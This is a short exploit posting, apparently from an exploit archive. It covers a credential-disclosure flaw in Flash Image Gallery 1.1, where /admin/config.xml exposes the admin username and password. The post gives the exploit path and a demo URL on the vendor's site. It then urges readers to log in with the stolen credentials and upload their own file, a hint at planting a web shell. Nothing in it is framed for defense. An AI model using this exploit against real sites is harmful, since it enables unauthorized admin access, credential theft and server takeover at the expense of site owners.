id: 5255
date: 05/25/2009
title: Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability
author: DarkbiteX
cves: 

======================================================================
Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability
======================================================================


#########################################################################################
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX

########################################################################################
Bug:[Sensitive Data Disclosure]
########################################################################################

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                
                 Use Of The Imagination and UPLOAD your archive ;) 
#########################################################################################



#  0day.today [2023-03-25]  #